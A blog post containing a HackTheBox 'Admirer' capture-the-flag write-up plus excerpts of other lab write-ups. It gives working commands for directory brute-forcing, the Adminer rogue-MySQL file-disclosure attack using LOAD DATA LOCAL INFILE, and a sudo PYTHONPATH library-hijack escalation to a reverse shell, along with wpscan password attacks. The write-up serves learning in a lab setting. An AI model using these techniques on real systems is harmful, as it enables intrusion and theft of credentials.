Admirer Write-up | HackTheBox | By Valerie23

ENUMERATION 

As always let start with basic port scan.


Lets visit port 80. And take a look at its source code. There is nothing worthy of our attention here.

GOBUSTER

Running gobuster against the target with hope of finding some hidden directories.

gobuster dir -u http://admirer.htb/ -w /usr/share/wordlists/dirb/common.txt -t 50


Taking a look at robots.txt:

So now we have found a username "waldo" and a hidden directory /admin-dir that contains interesting files. We are going to access this directory now
The directory is forbidden. But we shouldn't lose hope this soon. Lets try to access the possible folders inside it (as mentioned in /robots.txt).
http://10.10.10.187/admin-dir/contacts.txt
http://10.10.10.187/admin-dir/credentials.txt

FTP

Using the ftp credentials try connecting to  port 21.

The user and password was valid and we were able to successfully login to ftp even find some files worth looking at so we transfered it into our systems.
Dump.sql doesn't contain any clue.
So its time to unzip the other file using the command 

tar -xzf html.tar.gz

In the process of exploring all the files and directories for finding next clue we find that index.php contains the following piece of information

and db_admin.php inside /utility-scripts contains the following credentials:

Trying to use these credentials for loging in to ssh we get "Permission denied" in result.
Looks the backup we got from ftp account is not up to date.
And the directory /w4ld0s_s3cr3t_d1r contains the "/credentials.txt" and "contacts.txt" files which we were able to access through the url. So lets try to access these directories through website so we can get the updated information.
Lets run a gobuster scan on /utility-scripts to find files existing inside this folder
gobuster dir -u http://admirer.htb/utility-scripts -w /usr/share/wordlists/dirb/common.txt -t 50 -x php

We found a file named "/info.php". Lets see what it contains....nothing good.
So now we are stuck.
Lets take the help of google and search for something like "admirer.php"
It returns us a name "Adminer" which is a DBMS tool written in php

Lets try acccess: http://10.10.10.187/utility-scripts/adminer.php


VULNERABILITY

While searching for "Adminer 4.6.2 exploits" we get to know about a File Disclosure Vulnerability 

How Does It Work?
First, the attacker will access the victim’s Adminer instance, but instead of trying to connect to the
victim’s MySQL database, they connect “back” to their own MySQL database hosted on their own server.

Second, using the victim’s Adminer (connected to their own database) – they use the MySQL command
‘LOAD DATA LOCAL’, specifying a local file on the victim’s server.

For more information visit: https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

DATABASE SETUP

Lets set up our database:
Starting with,
sudo service mysql start  -For starting the sql service
sudo service mysql status  -To check if the service has successfully started. If output returns the "active" status then it means our command has executed properly.
sudo mysql -u root -p  -Login to mysql with a blank password.
create database adminer;  
show databases;
 
create user 'htb'@'%' identified by 'htbadminer';   -The query will create a user named htb with password htbadminer and the % sign tells that the username is valid for remote hosts also usually we add user@localhost but here we are going to connect from remote address, hence the % sign.
grant all privileges on *.* to 'htb'@'%';   -Will grant all the privileges to user htb
flush privileges;   -For activating the given privileges
use adminer;  -For changing database
create table test(data varchar(300));  -A table in which we will import all the data 

One last thing that we need to do now is to edit the /etc/mysql/mariadb.conf.d/50-server.cnf file and change the bind-address to 0.0.0.0 so that the connections from foreign hosts gets accepted.

So our database is all set now lets go to the login page again 
Fill in the values of all the fields: localhost, username, password, dbname.
After logging in we can see this page


Now clicking on the SQL command option in the left side of the page we get a place for execution of sql queries.
Type in 

LOAD DATA LOCAL INFILE "../index.php" 
INTO TABLE test
FIELDS TERMINATED BY "\n";

SELECT * FROM test;
Enter the above command to view the contents of index.php.
We can look at all the data loaded into our table. And find the updated ssh credentials.
Now we can connect to ssh using these credentials.
ssh waldo@10.10.10.187
and get the user flag.

PRIVILEGE ESCALATION

Following our standards we do sudo -l and find this: (ALL) SETENV: /opt/scripts/admin_tasks.sh
Lets see what this script do
This function runs another script backup.py


We don't have permissions to edit either of the two scripts.
Lets move our focus to the second line of backup.py , "from shutil import make_archive" 
What we can do now is create a file named shutil.py and put the following code inside it

Then set Python path environment using sudo 
sudo PYTHONPATH=/dev/shm /opt/scripts/admin_tasks.sh
To gain a reverse shell and in turn the root flag.
 


                                                                      -by Valerie23

Comments

Post a Comment

Popular posts from this blog

THM: Blog Room Writeup

Image
Here is the link of this great room:  Blog by Nameless0ne . L et's start guys.. Enumeration First I ran the nmap scan: 1.First lets check out the Blog itself running on the port 80. From little enumeration we can say that this is a simple blog running on the Wordpress. 2. The blog contains a single post by a user named Karen Wheeler for Billy joel. 3. To enumerate the users on the blog I will be using WPscan.           wpscan --url blog.thm -e u This command will list all the users on the Blog, bjoel & kwheel. 4. Let's try to find out the password of these users using the same tool again.          wpscan -U username --password <pass file> -t 30 --password-attack wp-login --url blog.thm 5. Try to run your own command. It won't take long before the password pops. (hint: try Mom name) 6. After login into the wordpress I saw the user had very limited capabilities so there must be some other way to the shell or some k...
Read more

Carpe-Diem | Tryhackme | Writeup

Image
Room:  Carpe - diem  Big shout out to the creator of this room:  4ndr34z Overview:   In this room we have retrieve the key which is used to encrypt a database file stored at /downloads/database.carpe. For me this room was too challenging and hence this writeup for all the coming folks. I have tried to explain everything so that the beginners could understand it easily. Enumeration: 1. A s usual we will start with NMAP scan From port scan we found there is nothing unique or interesting running except the port 80. So we should open the website and do some enumeration. 2. This website is asking us to send proof of our bitcoin address..and only after that you can retrieve the key..(I think thats what the theme of this room .. a perfect ransomware attack) 3. After that we review the source code of the webpage and always read those javascripts. Explanation:  first this code is checking that you don't copy the same address and send to proof and if you do that it pop up...
Read more

GamingServer | TryHackMe | by Valerie23

Image
LINK TO THE ROOM:  GamingServer NMAP SCAN Let’s do nmap first and see what do we get. nmap -Pn -sV 10.10.159.106 The results come back showing : Port 22 & 80. Since we don't have any credentials lets enumerate port 80 first. GOBUSTER  Lets fireup a gobuster scan for finding hidden directories. gobuster dir -u http://10.10.159.106/ -w /usr/share/wordlists/dirb/common.txt -t 50 WEB ANALYSIS Visiting port 80. And checking its source code gives us a username. Lets visit some of the interesting directories that we found earlier from gobuster scan. /uploads It has a dictionary list that looks like a list of passwords. So we will just copy and paste the content into a new file. And now we are going to visit another directory /secret to find the secrets. Looks like a ssh key but encrypted. In order to decrypt the ssh key we first need to copy and paste it into a file then find its password. Used commands: locate ssh2john /usr/share/john/ssh2john.py sshkey > key_hash Now the fil...
Read more